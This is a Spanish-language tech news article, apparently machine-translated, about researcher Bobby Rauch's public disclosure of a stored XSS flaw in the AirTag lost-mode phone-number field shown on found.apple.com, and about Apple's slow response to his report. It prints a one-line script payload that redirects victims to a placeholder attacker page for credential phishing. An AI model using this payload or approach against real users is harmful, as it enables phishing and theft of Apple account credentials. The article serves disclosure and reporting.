Noticias Tecnológicas

Apple olvidó desinfectar el campo del número de teléfono para AirTags perdidos

Agrandar / Los AirTags de Apple, como se ve adjunto a una mochila arriba, permiten a los usuarios encontrar su propio dispositivo retransmitiendo la ubicación de otros usuarios de Apple. Si todo lo demás falla, el usuario puede activar un «modo perdido» que se supone que muestra su número de teléfono cuando un buscador escanea el AirTag faltante.

Los éxitos siguen volviendo al programa de recompensas por errores de Apple, que según los investigadores de seguridad es lento e inconsistente para responder a sus informes de vulnerabilidad.

Esta vez es vuln del día se debe a que un campo de entrada del usuario no se está limpiando, específicamente el campo de número de teléfono que los propietarios de AirTag usan para identificar sus dispositivos perdidos.

El ataque del buen samaritano

Los AirTags son dispositivos diminutos con forma de botón que se personalizan con un grabado y se adjuntan a dispositivos que se pierden fácilmente, ya sea directamente o vía.  se puede adjuntar
Agrandar / Los AirTags son dispositivos diminutos con forma de botón que se pueden personalizar con grabado y adjuntar a dispositivos que se pierden fácilmente, ya sea directamente o mediante soportes de «bucle».

El asesor de seguridad y probador de penetración Bobby Rauch descubrió que los AirTags de Apple, dispositivos diminutos que se pueden conectar a elementos que se pierden con frecuencia, como computadoras portátiles, teléfonos o llaves del automóvil, no desinfectan la entrada del usuario. Esta supervisión abre la puerta a AirTags que se pueden usar en un ataque de caída. En lugar de cargar el estacionamiento de un objetivo con unidades USB cargadas con malware, un atacante puede volcar un AirTag preparado maliciosamente.

Este tipo de ataque no requiere muchos conocimientos tecnológicos: el atacante simplemente ingresa un XSS válido en el campo de número de teléfono de AirTag, luego pone el AirTag en modo perdido y lo coloca en una ubicación que es probable que el objetivo encuentre. En teoría, escanear un AirTag perdido es una acción segura: solo debería aparecer un sitio web en https://found.apple.com/. El problema es ese found.apple.com luego incrusta el contenido del campo del número de teléfono en el sitio web tal como aparece en el navegador de la víctima, sin limpiar.

La forma más obvia de explotar esta vulnerabilidad, según Rauch, es usar XSS simple para mostrar un cuadro de diálogo de inicio de sesión de iCloud falso en el teléfono de la víctima. Esto no requiere mucho código:

<script>window.location='https://path/to/badsite.tld/page.html';var a="";</script>

si found.apple.com incrusta inocentemente el XSS anterior en la respuesta de un AirTag escaneado, la víctima recibirá una ventana emergente que muestra el contenido de. indica badside.tld/page.html. Esto puede ser un exploit de día cero para el navegador o simplemente un cuadro de diálogo de phishing. Rauch sospecha un cuadro de diálogo de inicio de sesión de iCloud falso que puede verse exactamente como el real, pero en su lugar almacena las credenciales de Apple de la víctima en el servidor del objetivo.

Si bien este es un exploit convincente, no es el único disponible: casi todo lo que puede hacer con un sitio web está sobre la mesa y disponible. Esto va desde un simple phishing, como en el ejemplo anterior, hasta exponer el teléfono de la víctima a una vulnerabilidad del navegador de día cero sin hacer clic.

Más detalles técnicos, y videos simples que muestran tanto la vulnerabilidad como la actividad de la red provocada por la explotación de la vulnerabilidad de Rauch, están disponibles en la divulgación pública de Rauch en Medium.

Esta divulgación pública de Apple

Según un informe de Krebs sobre seguridad, Rauch está anunciando públicamente la vulnerabilidad, que se debe principalmente a errores de comunicación de Apple, un estribillo cada vez más común.

Rauch le dijo a Krebs que primero reveló en privado la vulnerabilidad a Apple el 20 de junio, pero que durante tres meses la compañía solo le dijo que estaba «todavía bajo investigación». Esta es una reacción extraña a lo que parece ser un error extremadamente simple que necesita ser verificado y mitigado. El jueves pasado, Apple le envió un correo electrónico a Rauch para decirle que la vulnerabilidad se solucionará en una próxima actualización y le pidió que no hablara públicamente sobre ella mientras tanto.

Apple nunca respondió a las preguntas básicas que hizo Rauch, como si había un calendario para corregir el error, si se le debería acreditar el informe y si era elegible para una recompensa. La falta de comunicación de Cupertino hizo que Rauch se hiciera público en Medium, aunque Apple requiere que los investigadores mantengan en secreto sus descubrimientos si quieren crédito y / o compensación por su trabajo.

Rauch acordó trabajar con Apple, pero le pidió a la compañía que «proporcionara algunos detalles sobre cuándo les gustaría arreglar esto y si habría una recompensa o un pago por error». También advirtió a la compañía que no lo liberara en 90 días. Rauch dice que la respuesta de Apple fue: «Básicamente, le agradeceríamos que no filtrara esto».

Le pedimos a Apple un comentario y actualizaremos aquí con cada respuesta.

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba